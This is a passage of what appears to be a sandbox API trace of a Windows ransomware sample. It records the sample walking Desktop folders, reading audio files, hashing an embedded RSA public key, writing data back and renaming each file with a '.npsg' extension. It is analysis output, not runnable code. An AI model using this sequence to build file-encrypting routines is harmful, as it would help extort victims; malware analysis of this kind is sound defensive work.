KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.322] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.322] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.322] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.323] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.324] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.324] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.324] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.324] GetLastError () returned 0x0 [0237.324] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.324] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.324] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.324] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.324] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf3b0) returned 0x3b95d50 [0237.325] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408fc0 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409008 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400560 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.326] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005a8 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400590 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.327] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf3ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.327] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.327] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.327] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.328] CloseHandle (hObject=0x644) returned 1 [0237.330] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\_U 7JKtu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\_u 7jktu.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\_U 7JKtu.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\_u 7jktu.wav.npsg")) returned 1 [0237.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.331] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0237.333] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b2cd620, ftCreationTime.dwHighDateTime=0x1d5c091, ftLastAccessTime.dwLowDateTime=0xf3928d60, ftLastAccessTime.dwHighDateTime=0x1d5b7b1, ftLastWriteTime.dwLowDateTime=0xf3928d60, ftLastWriteTime.dwHighDateTime=0x1d5b7b1, nFileSizeHigh=0x0, nFileSizeLow=0xf3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_U 7JKtu.wav", cAlternateFileName="_U7JKT~1.WAV")) returned 0 [0237.333] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.333] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.333] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.333] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\") returned="UKh5\\" [0237.333] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0237.333] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.334] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.334] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.334] PathFindFileNameW (pszPath="") returned="" [0237.334] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3576ea60, ftCreationTime.dwHighDateTime=0x1d5b9e6, ftLastAccessTime.dwLowDateTime=0xbbf91390, ftLastAccessTime.dwHighDateTime=0x1d5bb23, ftLastWriteTime.dwLowDateTime=0xbbf91390, ftLastWriteTime.dwHighDateTime=0x1d5bb23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.335] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3576ea60, ftCreationTime.dwHighDateTime=0x1d5b9e6, ftLastAccessTime.dwLowDateTime=0xbbf91390, ftLastAccessTime.dwHighDateTime=0x1d5bb23, ftLastWriteTime.dwLowDateTime=0xbbf91390, ftLastWriteTime.dwHighDateTime=0x1d5bb23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.335] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fe92b10, ftCreationTime.dwHighDateTime=0x1d5bdbe, ftLastAccessTime.dwLowDateTime=0x8cb6bc70, ftLastAccessTime.dwHighDateTime=0x1d5bfcb, ftLastWriteTime.dwLowDateTime=0x8cb6bc70, ftLastWriteTime.dwHighDateTime=0x1d5bfcb, nFileSizeHigh=0x0, nFileSizeLow=0x73a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3cSlbbowxq5ttWRL0.mp3", cAlternateFileName="3CSLBB~1.MP3")) returned 1 [0237.335] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\3cSlbbowxq5ttWRL0.mp3") returned=".mp3" [0237.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\3cSlbbowxq5ttWRL0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\3cslbbowxq5ttwrl0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.336] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=29609) returned 1 [0237.336] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.339] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7383, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.339] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.341] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x73a9, lpOverlapped=0x0) returned 1 [0237.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.343] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.343] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.344] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.344] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.344] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.344] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.344] GetLastError () returned 0x0 [0237.344] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.344] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.344] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.344] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.344] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x73b0) returned 0x3b83cd0 [0237.345] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409008 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400560 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409050 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400608 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005c0 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.345] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400608 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005c0 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34005a8 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.347] GetCurrentThreadId () returned 0x5b4 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82048 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.347] GetCurrentThreadId () returned 0x5b4 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400608 [0237.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 